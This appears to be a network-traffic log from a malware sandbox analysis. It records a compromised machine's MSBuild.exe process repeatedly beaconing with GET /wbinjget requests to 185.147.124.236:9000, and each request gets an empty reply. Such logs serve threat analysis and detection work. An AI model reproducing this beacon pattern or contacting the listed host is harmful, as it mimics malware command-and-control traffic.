3	192.168.2.7	49837	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:54.119487047 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:10:55.431103945 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49843	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:55.677562952 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:10:56.978300095 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49846	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:57.214643955 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:10:58.525238037 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:58 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49852	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:10:58.759933949 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:00.075411081 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:10:59 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49857	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:00.308928967 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:01.610138893 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:01 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49861	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:01.838020086 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:03.148243904 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:02 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49867	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:03.385427952 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:04.707243919 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:04 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49873	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:04.949327946 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:06.250518084 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:06 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49876	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:06.496146917 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:07.797420979 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:07 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49882	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:08.043195009 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:09.345585108 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:09 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49888	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:09.572279930 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:10.888974905 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:10 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49891	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:11.119092941 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:12.430778027 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:12 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49898	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:12.962897062 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:14.232043028 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:14 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49903	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:14.464970112 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:15.776953936 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:15 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49908	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:16.021059036 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:17.323746920 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:17 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49912	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:17.709542990 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:19.010945082 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:18 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49918	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:19.245235920 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:20.555797100 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:20 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49925	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:20.791625023 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:22.102801085 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:21 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49927	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:22.339524031 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:23.648896933 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:23 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49934	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:23.886215925 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:25.189086914 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:24 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49939	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:25.428355932 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:26.729085922 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:26 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49945	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:26.971807003 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:28.272865057 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:28 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49948	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:28.607798100 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:29.911593914 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:29 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49954	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:30.135432959 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:31.439415932 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:31 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49960	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:31.669440985 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:32.979716063 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:32 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49964	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:33.217499018 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:34.518107891 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:34 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49969	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:34.748703957 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:36.059472084 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:35 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49975	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:36.327064037 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:37.628654003 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:37 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49982	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:37.853988886 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:39.163470030 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:38 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49984	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:39.400794983 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:40.701817036 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:40 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49990	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:40.941215038 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
Dec 17, 2024 08:11:42.253207922 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:42 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49996	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:42.479238987 CET	89	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000
Dec 17, 2024 08:11:43.795974970 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:11:43 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49999	185.147.124.236	9000	5204	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:11:44.025511026 CET	113	OUT	GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1 Host: 185.147.124.236:9000 Connection: Keep-Alive
